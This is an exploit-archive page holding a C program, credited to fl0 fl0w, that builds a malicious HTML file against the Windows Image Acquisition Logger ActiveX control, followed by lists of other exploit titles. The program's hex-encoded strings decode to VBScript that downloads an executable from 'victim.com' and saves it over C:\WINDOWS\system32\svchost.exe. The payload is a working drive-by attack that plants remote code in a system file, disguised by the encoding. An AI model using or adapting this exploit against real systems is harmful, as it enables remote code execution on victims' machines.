Menu

Search for hundreds of thousands of exploits

"Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)"

Author

Exploit author

Ciph3r

Platform

Exploit platform

windows

Release date

Exploit published date

2008-09-08

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
source: https://www.securityfocus.com/bid/31069/info
 
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
 
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks. 

/*Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite
  Credits for finding the bug go to S4rK3VT TEAM,nice work Ciph3r :) .
  Credits for exploit go to fl0 fl0w
  References- https://www.securityfocus.com/bid/31069/info
*/

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>


  char file_1[]=
"\x3C\x6F\x62\x6A\x65\x63\x74\x20\x63\x6C"
"\x61\x73\x73\x69\x64\x3D\x22\x63\x6C\x73"
"\x69\x64\x3A\x41\x31\x45\x37\x35\x33\x35"
"\x37\x2D\x38\x38\x31\x41\x2D\x34\x31\x39"
"\x45\x2D\x38\x33\x45\x32\x2D\x42\x42\x31"
"\x36\x44\x42\x31\x39\x37\x43\x36\x38\x22"
"\x20\x69\x64\x3D\x27\x74\x65\x73\x74\x27"
"\x3E\x3C\x2F\x6F\x62\x6A\x65\x63\x74\x3E"
"\x0D\x0A\x0D\x0A\x3C\x69\x6E\x70\x75\x74"
"\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D"
"\x56\x42\x53\x63\x72\x69\x70\x74\x20\x6F"
"\x6E\x63\x6C\x69\x63\x6B\x3D\x74\x72\x79"
"\x4D\x65\x28\x29\x20\x74\x79\x70\x65\x3D"
"\x62\x75\x74\x74\x6F\x6E\x20\x76\x61\x6C"
"\x75\x65\x3D\x27\x43\x6C\x69\x63\x6B\x20"
"\x68\x65\x72\x65\x20\x74\x6F\x20\x73\x74"
"\x61\x72\x74\x20\x74\x68\x65\x20\x74\x65"
"\x73\x74\x27\x3E\x0D\x0A\x0D\x0A\x3C\x73"
"\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67"
"\x75\x61\x67\x65\x3D\x27";

  char file_2[]=
"\x76\x62\x73\x63\x72\x69\x70\x74\x27\x3E\x0D\x0A\x20\x20\x53"
"\x75\x62\x20\x74\x72\x79\x4D\x65\x0D\x0A\x20\x20\x20\x64\x69"
"\x6D\x20\x72\x65\x6D\x55\x52\x4C\x0D\x0A\x20\x20\x20\x72\x65"
"\x6D\x55\x52\x4C\x20\x3D\x20\x22\x68\x74\x74\x70\x3A\x2F\x2F"
"\x76\x69\x63\x74\x69\x6D\x2E\x63\x6F\x6D\x2F\x73\x76\x63\x68"
"\x6F\x73\x74\x2E\x65\x78\x65\x22\x0D\x0A\x20\x20\x20\x74\x65"
"\x73\x74\x2E\x4F\x70\x65\x6E\x20\x72\x65\x6D\x55\x52\x4C\x2C"
"\x20\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x74\x65\x73\x74\x2E"
"\x53\x61\x76\x65\x20\x22\x43\x3A\x5C\x57\x49\x4E\x44\x4F\x57"
"\x53\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x76\x63\x68"
"\x6F\x73\x74\x2E\x65\x78\x65\x22\x2C\x20\x54\x72\x75\x65\x0D"
"\x0A\x20";

 char file_3[]=
"\x45\x6E\x64\x20\x53\x75\x62\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E";

 void usage(char *);
 int main(int argc,char *argv[])
 {  FILE *m;
    unsigned int offset=0;
    
    if(argc<2)
   { usage(argv[0]); } 
   
     if((m=fopen(argv[1],"wb"))==NULL)
   { printf("error"); 
     exit(0); 
   } 
    char *buffer;
    buffer=(char *)malloc(strlen(file_1)+strlen(file_2)+strlen(file_3));
    
    memcpy(buffer,file_1,strlen(file_1)); offset=strlen(file_1);
    memcpy(buffer+offset,file_2,strlen(file_2)); offset+=strlen(file_2);
    memcpy(buffer+offset,file_3,strlen(file_3));
    fprintf(m,"%s",buffer);
    system("cls");
    printf("|****************************************************||\n");
    printf("Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite\n"); 
    printf("File successfully built\n");
    system("color 02"); 
    Sleep(2000);
    printf("|****************************************************||\n");
    
    free(buffer);
    fclose(m);
return 0;    
      }
      
 void usage(char *f)
 {  printf("|****************************************************||\n");
    printf("Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwrite\n\n");    
    printf("Usage: exploit.exe file.html\n\n");
    printf("Credits for finding the bug go to S4rK3VT TEAM\n");
    printf("Credits for exploit go to fl0 fl0w\n");
    printf("|****************************************************|\n");
    
    system("color 03");
    Sleep(2000);
       }
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2012-08-29 "Winlog Lite SCADA HMI system - Overwrite (SEH)" dos windows Ciph3r
2012-08-16 "Microsoft Internet Explorer - Time Element Memory Corruption (MS11-050)" remote windows Ciph3r
2012-07-23 "Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure" webapps linux Ciph3r
2008-10-06 "Internet Download Manager 4.0.5 - File Parsing Buffer Overflow" remote windows Ciph3r
2008-09-29 "Nokia PC Suite 7.0 - Remote Buffer Overflow" remote windows Ciph3r
2008-09-25 "Mass Downloader - Malformed Executable Denial of Service" dos windows Ciph3r
2008-09-22 "UNAK-CMS - Cookie Authentication Bypass" webapps php Ciph3r
2008-09-09 "Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload" webapps php Ciph3r
2008-09-09 "Stash 1.0.3 - Insecure Cookie Handling" webapps php Ciph3r
2008-09-08 "Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (1)" remote windows Ciph3r
2008-09-08 "Microsoft Windows - Image Acquisition Logger ActiveX Control Arbitrary File Overwrite (2)" remote windows Ciph3r
2008-09-08 "PHP 5.2.5 - Multiple functions 'safe_mode_exec_dir' / 'open_basedir' Restriction Bypass Vulnerabilities" local php Ciph3r
2008-08-13 "Nukeviet 2.0 - '/admin/login.php' Cookie Authentication Bypass" webapps php Ciph3r
2008-07-21 "XOOPS 2.0.18 - '/modules/system/admin.php?fct' Cross-Site Scripting" webapps php Ciph3r
2008-07-21 "RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion" webapps php Ciph3r
2008-07-21 "XOOPS 2.0.18 - '/modules/system/admin.php?fct' Traversal Local File Inclusion" webapps php Ciph3r
2008-07-21 "AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Authentication Bypass" webapps php Ciph3r
2008-07-21 "eSyndiCat 1.6 - 'admin_lng' Cookie Authentication Bypass" webapps php Ciph3r
2008-07-21 "RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion" webapps php Ciph3r
2008-07-18 "Lemon CMS 1.10 - 'browser.php' Local File Inclusion" webapps php Ciph3r
2008-07-18 "CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion" webapps php Ciph3r
2008-07-18 "CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion" webapps php Ciph3r
2008-07-11 "facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion" webapps php Ciph3r
2008-07-02 "PHPortal 1.2 - Multiple Remote File Inclusions" webapps php Ciph3r
2008-06-26 "Orca 2.0/2.0.2 - 'params.php?gConf[dir][layouts]' Remote File Inclusion" webapps php Ciph3r
2008-06-19 "Lotus Core CMS 1.0.1 - Remote File Inclusion" webapps php Ciph3r
2008-06-19 "Orlando CMS 0.6 - Remote File Inclusion" webapps php Ciph3r 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected